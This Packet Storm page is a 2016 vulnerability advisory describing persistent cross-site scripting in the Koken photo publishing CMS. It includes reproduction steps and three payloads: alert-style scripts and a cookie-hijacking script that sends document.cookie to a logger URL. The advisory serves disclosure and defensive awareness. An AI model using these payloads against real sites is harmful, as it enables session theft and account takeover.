what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Koken 0.22.7 / 0.22.11 Cross Site Scripting

Koken 0.22.7 / 0.22.11 Cross Site Scripting
Posted Nov 25, 2016
Authored by Taurus Omar

Koken versions 0.22.7 and 0.22.11 suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 9fe51081577a7f4582734f5ebf704d8cee00e997d6879736d50ed304ecb185c4

Koken 0.22.7 / 0.22.11 Cross Site Scripting

Change Mirror Download
  ____        _           _____           
| _ \ | | / ____|
| |_) |_ _| |__ ___| (___ ___ ___
| _ <| | | | '_ \ / _ \\___ \ / _ \/ __|
| |_) | |_| | | | | (_) |___) | __/ (__
|____/ \__,_|_| |_|\___/_____/ \___|\___|


Document Title:
===============
Koken 0.22.7 & 0.22.11 Multiple Web Vulnerabilities

Credits & Authors:
==================
TaurusOmar - @TaurusOmar_ (taurusomar@buhosec.com) [taurusomar.buhosec.com]

Release Date:
=============
2016-24-11

Product & Service Introduction:
===============================

Built for photography: Your images are your most important asset. Koken treats them with the attention they deserve by including a full-featured management interface that looks and feels like a desktop application. Work and words, together: Write about portfolio updates, inspiration, or anything that comes to mind. Images, videos, slideshows and content from Flickr, Instagram, Vimeo, SoundCloud and Twitter are a snap to display.
Live site previewing and editing: Setup your navigation, add pages, and edit your site's color and layout with simple point-and-click controls. No HTML experience required.
Themes and plugins: Browse, select and install themes and plugins through an integrated store. Everything downloads and installs automatically to your Koken installation.



Abstract Advisory Information:
==============================
An independent researcher discovered multiple vulnerabilities in the official aplication My Koken 0.22.7 & 0.22.11

Vulnerability Disclosure Timeline:
==================================
2016-24-11: Public Disclosure

Discovery Status:
=================
Published


Affected Product(s):
====================
Koken - Creative website publishing
Product: Koken 0.22.7 & 0.22.11
http://koken.me/

Exploitation Technique:
=======================
Local


Severity Level:
===============
medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Koken 0.22.7
The vulnerability allows a local attacker to inject own script code as payload to the application-side of the vulnerable service function or module.
The vulnerability exists in the text box labels links in which injects the code is activated when the web server option to transfer


Request Method(s):

[+] Export

Vulnerable Module(s):

[+] Add Label Links

Vulnerable Parameter(s):

[+] Label Link Box


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


1. Add new user o use account admin
2. Go to path http://tusitio.com/koken/admin/#/site/draft/theme/url:/
3. On the menu Site > click to add Links/Footer or Links/Primary
4. In the section Label Links add you script
4. Successful reproduce of the persistent vulnerability!

Proof of Concept (IMAGES):
==========================

1. http://i.imgur.com/AAcFkwP.png
2. http://i.imgur.com/d7LuGLN.png

Vulnerability Code
=======================
<a data-bind="css: { 'front-page': $data.front && front }" class="item" href="#"><span class="in"><span data-bind="attr: { class: 'icon16 label-' + ($data.auto && $data.auto === 'rss' ? 'rss' : 'chain') }, text: label" class="icon16 label-chain">VULNERABILITY_CODE</span><span class="front-mark">(front<span class="front-hidden">&nbsp;/&nbsp;hidden</span>)</span></span></a>

PoC_1: Persistent Cross Site Scripting / Path / Footer
======================================================
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiVnVsbmVyYWJsZSIpOzwvc2NyaXB0Pg=="></object>

PoC_2: Persistent Cross Site Scripting / Path / Primaty
=======================================================
<script>alert(String.fromCharCode(88,83,83))</script>

PoC_3:Hijacking Vulnerability / Path/ Any
=======================================================
<script>document.location="http://www.tusitio.com/cookielogger.php?cookie=" + document.cookie;</script>


Security Risk:
==============
The security risk of the persistent input validation vulnerability in the name value is estimated as medium.
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close